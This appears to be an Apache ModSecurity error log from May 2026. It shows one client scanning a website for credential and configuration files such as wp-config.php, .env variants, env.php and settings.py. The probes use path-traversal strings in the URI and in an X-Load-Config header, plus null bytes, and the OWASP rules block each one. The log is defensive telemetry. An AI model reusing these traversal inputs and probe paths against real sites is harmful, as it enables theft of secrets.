[Tue May 12 05:10:32.214256 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLgAAARY"]
[Tue May 12 05:10:32.214356 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLgAAARY"]
[Tue May 12 05:10:32.214537 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLgAAARY"]
[Tue May 12 05:10:32.215355 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY0QAAAEQ"]
[Tue May 12 05:10:32.215509 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY0QAAAEQ"]
[Tue May 12 05:10:32.215700 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY0QAAAEQ"]
[Tue May 12 05:10:32.229432 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.229489 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.229517 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.229677 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.229719 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.229750 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.230061 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.230256 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOQAAAJY"]
[Tue May 12 05:10:32.232648 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLwAAARY"]
[Tue May 12 05:10:32.232727 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.staging"] [unique_id "agKaKNr1yOh9TvizeziY0gAAAEQ"]
[Tue May 12 05:10:32.232775 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLwAAARY"]
[Tue May 12 05:10:32.232859 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.staging"] [unique_id "agKaKNr1yOh9TvizeziY0gAAAEQ"]
[Tue May 12 05:10:32.232978 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLwAAARY"]
[Tue May 12 05:10:32.233056 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.staging"] [unique_id "agKaKNr1yOh9TvizeziY0gAAAEQ"]
[Tue May 12 05:10:32.250129 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaKNr1yOh9TvizeziY0wAAAEQ"]
[Tue May 12 05:10:32.250213 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250247 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250270 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaKNr1yOh9TvizeziY0wAAAEQ"]
[Tue May 12 05:10:32.250275 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250441 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250459 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaKNr1yOh9TvizeziY0wAAAEQ"]
[Tue May 12 05:10:32.250484 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250509 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250797 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.250997 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1"] [unique_id "agKaKM1tk6y7yBJLpJozOgAAAJY"]
[Tue May 12 05:10:32.251089 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nMAAAARY"]
[Tue May 12 05:10:32.251210 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nMAAAARY"]
[Tue May 12 05:10:32.251389 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nMAAAARY"]
[Tue May 12 05:10:32.267328 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.dev"] [unique_id "agKaKNr1yOh9TvizeziY1AAAAEQ"]
[Tue May 12 05:10:32.267467 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.dev"] [unique_id "agKaKNr1yOh9TvizeziY1AAAAEQ"]
